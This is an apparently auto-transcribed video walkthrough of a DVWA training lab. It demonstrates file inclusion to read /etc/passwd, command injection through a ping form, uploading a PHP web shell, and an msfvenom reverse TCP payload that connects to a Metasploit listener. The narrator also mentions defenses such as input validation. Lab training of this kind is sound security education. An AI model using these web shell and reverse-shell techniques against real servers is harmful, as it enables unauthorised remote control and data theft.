not familiar with pen testing, this is one of the most exciting things when it comes to security. So let's just go ahead and get into it. We're going to log into our machine. FYI, I have a bunch of pen testing videos on YouTube. You can check it out on our playlist, our Hack the Lab play or Hack the Box playlist. Bunch of them. Some of them are regarding this DVWA website we're going to interact with. Let's open up Firefox right now. And we're just going to open up this website, right? dvwastructuredreality.com. It may not load up for you right away. Give it a few, right? You may have to end the machine and come right back to it. It's okay. Y'all, before we get started, I just want to make sure I let you all know, if we're moving pretty fast during this, that is the goal. We're trying to get through this as swiftly as possible with as much information at the same time. If you need to slow it down, there's a feature on YouTube to slow this down. Please slow it down as much as you need it to be, right? But we do not want these videos to end up being an hour long. All right, let's get it. We're already in here. So the first thing we're gonna do is mess around with this file inclusion. What is file inclusion vulnerability? Well, we are about to find out. All right, so first things first, check this out. Look, once you click file inclusion, look at this web page, right? Look at the web address up here. It says page equals include.php, right? What the instruction want us to do is to go ahead and play around with that. I'm gonna go ahead and just move these all to the right hand side. We're gonna go ahead and play around with this. So if we switch the page equals and just add blah, B-L-A-H in front of it. Whoops. Well, it doesn't matter. If we just add blah, you can put the / in there if you want to. See how we get this error, right? It says no such file or directory. All right, well, you're giving us some information. You're letting us know like, hey, all right, this blah file, this blah folder doesn't exist on your web server, but other files and folders may exist. Now, let's take a pause real quick. What the heck does all of that mean? Well, here's the DVWA web server right here. This is the web server that we're interacting with right here. On this web server, there are other files on this server. There are password files, there are user files, there are a bunch of other files on this server that the web server, DVWA, is not supposed to show you. It's not supposed to show us the password file. It's not supposed to show us all the users on the system. We're not supposed to have access to that. We're only supposed to be able to see this website. Well, this file inclusion vulnerability is going to help us. We're going to try to traverse the directory. We're going to try to access the other files and folders. That's what I mean by traversing the directory. So that's what we're going to try to do. So for instance, we already know that this is probably vulnerable to file inclusion because it's telling us that no such file or directory exists. We shouldn't get that error message. It should just say, hey, failed, try again, right? Now what we're going to do is switch this out with the password file. So let's just switch the equals out with /etc password. The instructions want you to go through all the errors and mess up a few times, but essentially this is what we want to do. We want to change the page equals to /etc password, and this should show us, look at what we get. We get the /etc password file. If I open up the terminal, just so you can get a better visual representation, /etc password file, this is it right here. This is what we were able to traverse on that web server and get the same information right here. It's just not as structured as it would be in the command prompt. All right, usually when you're doing this on a real situation, on a real live production environment, you're gonna have to type something like this in maybe 6 times, right? This is how you CD, right? When we CD to a different directory, when we change directories, we have to do CD, right? I have to CD over the /etc password, right? But if I'm in the website directory var www.html, this is where your website's pages usually live. If I want to go to Etsy password, I have to cd .. // until I get to Etsy password, right? Until I get to the Etsy directory. That's what this .. is. We're just going back a few directories. All right, cool. We're gonna come down. How many change to parent operations are needed to create a relative URL reference? That's usually going to be 6, right? That's usually going to be 6. To view the password file, that's usually going to be 6. Right now, it's pretty easy. We only need to do Etsy password. We don't have to change the directory 6 times. We just need the / Etsy password. That's because we're on a test machine right now. All right. Next thing we're going to do, we're going to try to open up the shadow file, right? The shadow is where the passwords are stored. However, we're going to get permission denied because only the root user can access the shadow file, right? This web server DVWA is not using the root account to start up. It's using another account to launch up this web application. The applications on your systems that you're serving out to the world, right, such as DVWA, they need an account, right? This should not be using the root account. Obviously, it's not, because we can't access the shadow file, which is where your passwords are actually stored. All right, let's go ahead and access another directory. We're going to access the proc directory, which usually has information about your operating system. Right now, we use this proc version file. We can see the type of operating system we're using is Linux, is Debian based. Right, there's some other files in that folder that we can interact with. I'm not going to go through all of them, but let's look at CPU info. Right, that's giving us the CPU info. Let's look at uptime. This is showing us how long our system has been up and available. Right, we can look at modules. Right, this is all giving us different information about our system. Okay, how we're using the file inclusion vulnerability. This web application DVWA, this guy right here, is vulnerable to file inclusion. That means we can traverse his directories for other files and folders. All right, next we're going to do some command injection. This is another cool tool. I actually have videos of a lot of these on YouTube already. This is a command injection tool. This is when you're able to run system commands, right? System commands from the web application. That should not be a thing. If I type in, right, this is supposed to just be able to ping a device. That's all it's supposed to be able to do. So if we do 10.1.16.66, hit enter, it's going to try to ping that device, right? We can see the results right here. That's all this is supposed to do. It's not supposed to do anything else but ping the device. But if this input field is not properly sanitized, right? If this input field is not properly sanitized, we can do more than ping. So that's what we're going to do. We're going to do this. We're going to do the semicolon. The semicolon is going to allow us to add another command to this string. So now we're going to ping 127.0.0.1, and we're also going to run this command ls-la. What does ls-la do? It lists out the current files and folders in your directory. So this is what it's listing out, right? We can do something else. 127. I want to do pwd to see what directory we're currently in, right? That's not part of these instructions. I just want to see it, right? This is the directory we are currently inside of, the var www dvwa, right? The reason I wanted to see that is so you can see that we're really running. Oh, that's going to be on the web server. We're not on the web server, right? We're on Kali, right? The web server is over here. It's the LAMP server. So I'm not even going to go over there. I'm getting ahead of myself. All right, so let's go back over here. Let's run some more commands. We're gonna do this, right? We can use the semicolon to add, to combine commands. We can use the and symbol to combine commands. 127.0.0.1 and cat index.php. This is gonna cat open the index.php file, right? And then this is that index.php file. Looks pretty sloppy on the screen. Let's go ahead and do some more commands. Remember, the semicolon and the double and sign allows us to combine commands. All right, here we go. ls-la source. Okay, we can run some more commands. Let's do this one right here. Let's do semicolon, who am I? That's going to show us who the user is. Host name, that's going to give us the host name of the computer. IPA, that's going to give us the IP address. PWD, that's going to give us the present working directory. Uptime, that's going to give us how long the system was online. Look at all that information, right? Here's the username from the who am I. Here's the host name from the host name command. Here's the IPA command, right? And here's the PWD command, and then here's the uptime, right? Question, what is the result of the who am I? It's www data, right? That was the first command we ran, right? The first command we ran in that. All right, we can go ahead and type this in. This is pretty much going to combine some commands to make things look pretty. So let's do that. First, ls, ... boom. We want to list out that directory. Then we want to echo ... to the screen. All right, now we're going to do another command. ls, whatever's in this directory. Then we're going to echo ... to the screen again. Semicolon, ls, print out what's in that directory. So we're printing out the directory of this. We're going back 2 directories here, and then we're going up 3 directories here. All right, so look. It's just printing out the contents of certain directories. We're combining commands. Right, another thing we can use to combine command is this pipe symbol. Right, the pipe symbol is on your keyboard. Let me see if I can show it to you right here. The pipe symbol, it's, where is it? Well, on your keyboard it's going to be combined with this backslash. Right, so the way you enter the pipe symbol, you hit shift and then this. Oh yeah, it showed it. You hit shift and then that. Right, shift this. That's the pipe symbol. Shift this. You got to do it together on your keyboard though. So you can see mine right here. Shift / and we get the pipe. So we're going to cat Etsy password. That's going to give us the Etsy password file. This is a command injection. How do you stop command injection attacks? You need input validation. We should not be accepting these inputs. How do you stop the input validation? Is just a script on the back end that's checking the input that we're typing in. It should stop all of this, right? How do you stop the file inclusion vulnerability, right? Input validation as well, and then probably a reverse proxy to stop directory traversal. All right, let's go to the next one. Now we're going to have a little bit more fun. We're going to try to what is this one? We're gonna upload some files, right? We're gonna abuse this file uploader. Let's go to file upload. What we're gonna do is open up our terminal. We're gonna copy over a picture. Well, first I'm gonna go back to, I'm just gonna do cd root and hit enter. All right, cool. Now we're going to copy user share xer gtk images. We want this world picture. Hit space world.png. We're going to copy that picture here. You can see that the picture file is right there. Now we're going to upload it into DVWA. We're going to browse for that picture. I'm going to go back to root. And I'm going to upload that world picture. Now I'm going to select upload. right? Now check this out, it's been uploaded. We can just grab this right here. I'm gonna copy this to look at the picture on this web server. I'm gonna copy that. I'm gonna come up to the web address, hit the backspace, and I'm gonna paste what I copied. Look at the picture we just uploaded. This is a bad vulnerability. That means we can upload a script and execute the script by just typing in the URL right here. Right, that's actually what we're gonna do. So let's go back to the terminal. Right, first I'm gonna go back to DVWA. Now let's go back to the terminal to do what I just mentioned. We're gonna upload a script. First, let's create the script. We're gonna call it special.php. All right, we're gonna select I to insert, and now we're gonna type the script. PHP system request command boom. So here's our script. To type that script, we're just going to use the Vim editor. Type Vim, then the name of the script, and you go inside and type out the script. Here's the information for that script. Once that is saved, we're going to go ahead and upload it. Look, let's cat it out to make sure it looks good. Yes, sir. What this is going to do is allow us to run system commands from the web address. So we have to upload it first. Let's go and upload the script. We're going to browse for it. Here's special.php, upload. Now we're going to do the same thing. We're going to copy this. Paste it up here. All we're gonna do is remove that hashtag, paste this, boom. All right, we got an error right here. All right, we got an error, undefined index command. Let's see. That might be normal. What I'm gonna do is $CMD equals ls. Boom, look at that. We're able to run commands. Let me go back. We uploaded our script. This script is on that site. What this script allows us to do is run system level commands. We just have to give it the option of commands. Let me go back to the script real quick. Right, look at this. It's waiting, it's gonna take commands, and it's gonna run this system level command. Right, all we gotta do is give it the command. I'm gonna do it again. We uploaded the file, right? So we just copy this and we put that back here just like we did with the picture. But this time we're not dealing with the picture, we're dealing with our script. Now before you hit enter, I want you to hit the question mark and then give what the script is looking for. It's looking for this CMD. Now type a command. Let's do ls. It's listing out the current files in that directory. The current files are this email picture, this special script that we uploaded, and the world picture that we uploaded. Those are things that we uploaded to that web server. We can see that stuff. All right, watch this. Let's run another command, cat plus. Plus is for the space, right? Cat space. Instead of space, we're going to put plus, etc password. Look at that. It's print our script that we uploaded. We uploaded this script to the web server, right? And our script is saying, hey, if you just tell me the command to run, it's going to execute it for us, right? Now it's giving us the etc password file. This is a vulnerability. Servers should not allow you to upload malicious scripts. There needs to be some type of input validation that's validating the scripts, the files that you're uploading. This took our script, right? It should not have accepted our script. It should not have allowed us to upload it. And we should not be able to control or we should not be able to tack on our own URL over here to start manipulating what files on that server, right? That is a big vulnerability. We can prevent that with input validation. You can prevent that with a reverse proxy. You can prevent that with secure coding techniques. All right, next. Now we're going to have a little bit more fun. We're going to create some type of malware. So we're going to use MSF Venom. MSF Venom is what we use to create malicious different payloads. MSF Venom -P, we're going to create a PHP payload because that's what the language that this web server is using. Reverse TCP, lhost is going to be equals 999. Raw format, we're going to export this into the shell.php. Alright, so this is going to go ahead and create a payload called shell.php. We'll see more about it. I'm going to open up a new tab. This new tab is going to start up MSF console. Alright, MSF console is what we're going to use to accept the connection. So what we're doing right here, well, I'll explain it once we get to it. I'll explain it once we get to it. Alright, so we're going to start up MSF console. We're letting our script create. Okay, it is done. We can see that it is done. I'm going to hit ls. You can see there's our script, shell.php. Okay, shell.php. Before we upload it onto the web server, what I'm going to do is set up Metasploit. So I'm coming back to my Metasploit tab where we typed MSF console. I have a tab over here with the shell.php. I have another tab over here for Metasploit, right? We just typed MSF console to launch Metasploit. That's step 6. Now we're going to do the rest of step 6 to set up our listener. And don't worry, I'm going to draw out what we're doing. Use exploit. All right, we're going to set the payload to PHP interpreter reverse TCP. All right, we got to set the lhost. Same thing that we did in MSF Venom. We got to set it over here for the listener so it knows the payload we're using, the host we're using, and the port we want to listen on. Same thing from MSF Venom. Then we can look at our options, make sure everything is set. You can see that the L host is set 10.1.16.66. You can see the L port is set 99999. Sweet. Now we're just going to hit run. All right, so now that listener is running. So we have our listener running over here. This is the listener. I'm just going to put MSF. This is listening. It's waiting for a connection. Right, we're going to set up that connection from DVWA. We're going to force DVWA to connect to our listener. That's going to allow us to get remote code execution access. In other words, we're going to upload our shell here. We're going to upload that script, that shell.php script, into this website, right? It's accepting anything we upload. All right, let's give it a shell.php script. Once we upload it here, we're going to execute it the same way we've been executing everything else. We're just going to launch it on the web address. Once we launch it, the script is going to use DVWA to set up a connection to our listener. All right, so let's go ahead and do that. It's listening. Let's go and upload our script. We're going to browse, go to shell.php, boom, upload. All right, that has been loaded. Now what do? We're going to copy this. The same thing we've been doing, y'all. We're going to copy this. We're going to put an extra dot. We're going to paste it here. Now, after we do this, once we start this up, the shell has been uploaded onto the server. It's already been uploaded. We just did that. right? I didn't hit enter yet, so 1 second. We just uploaded it. We can see that it's uploaded. Now we're gonna execute the script. The way we execute it is just by going to the file, right? Once that's executed, it's going to do what we told it to do, which is to establish a connection with us on our IP address 10.1.16.66 to our open port 99.99999. So watch this. Oh, I don't think there's an issue with my script. Alright, I gotta do that, show that PHP over. There's an issue with my script uploads. Let me just make sure. If you did it right, you should see a session on your Metasploit. If you did it wrong, it's gonna look like this. So I gotta go back and fix that. That's fine. So what I'm gonna do, I'm gonna come back over to this tab and see what I did wrong. I didn't set my L host. I didn't set the, I did this wrong. This is sloppy, right? This should be 10.1.16.66 and that L port should be 9999. There we go. So we're gonna redo that. I'm gonna redo that. That was not right. So MSF Venom-P, this is the payload that we want to use, right? This payload is gonna set up a reverse connection back to us. We want it to connect back to our host, and we want it to connect to our host using this port. So I'm gonna re-upload that. I'm gonna browse here. I'm gonna re-upload this shell. Upload, cool. We still have Metasploit listening, right? Metasploit is still waiting for that connection to come through. Now what we're gonna do is activate our script. Okay, now this should work. Okay, boom. Nothing has happened here. You can see this is still spinning. That's because it's activated our script. If we go back to Metasploit, boom, we have our session. We have a session. We have an active session on this box. We have a command prompt open right now that can control this server, right? Our command prompt right here, this interpreter shell, is controlling that server. How do we know? Let's go ahead and run a few commands. Sysinfo, right? We are on the LAMP server. Remember I said that DVWA is actually being hosted on this LAMP server over here. So now we're gonna run some more commands. Let's get UID. Who are we using? This is the user we're using on that box. Remember we said DVWA is not using the root user, right? It's not using the root user. It's using this user, www-data. Right? That is why this file upload and file inclusion vulnerability is a big no-no, right? Because we can get shells like this. We can get interpreter shells like this where we can do whatever we want, right? If we hit the help key, we can see what else we can do. We can go ahead and take screenshots of their systems. We can start downloading files, uploading files. We can start capturing their keystrokes. There's so much we can do with a interpreter session. Alright, that is it. Let's go to the next one. Alright, what is the point of this string? This is for directory traversal attacks. Which of the following characters can be used to stack commands? It's going to be the double and sign, the semicolon, and the pipe. What is the most significant concern of a file upload vulnerability? An attacker change password, to run malicious code, learn the OS, running malicious code, just like we have done. Exploiting systems using directory traversal, command injection, file upload, and web shell injection techniques is typically performed during what phase? Gaining access. Injecting the web shell can be accomplished by taking advantage of what discovered vulnerability? Injecting a web shell. Well, file upload. Boom, that is it, y'all. We just went through some of the pen testing phases. We just did pen testing. We went through some of the phases here, right? We abused the file upload vulnerability, we abused the file inclusion vulnerability, and we abused the command injection vulnerability. Remember, command injection allows us to run system level commands from the web server, right? We're doing that from the web server, whether it's up here in the web address or whether it's on the actual web server. We're running commands we shouldn't be able to run. We abused the file upload vulnerability. We uploaded a picture up there, world.png, just to see if it would work. We uploaded it and we were able to access it from the web address bar. Then you said, you know what, let's take it a step further. So we created a shell, we created a interpreter payload. And we created that interpreter payload, called it shell.php, uploaded it to the web server, set up our listener on Metasploit, and then we just activated our script by just going to it. Boom. Alright, y'all, if you enjoyed this series, don't forget to smash that like button.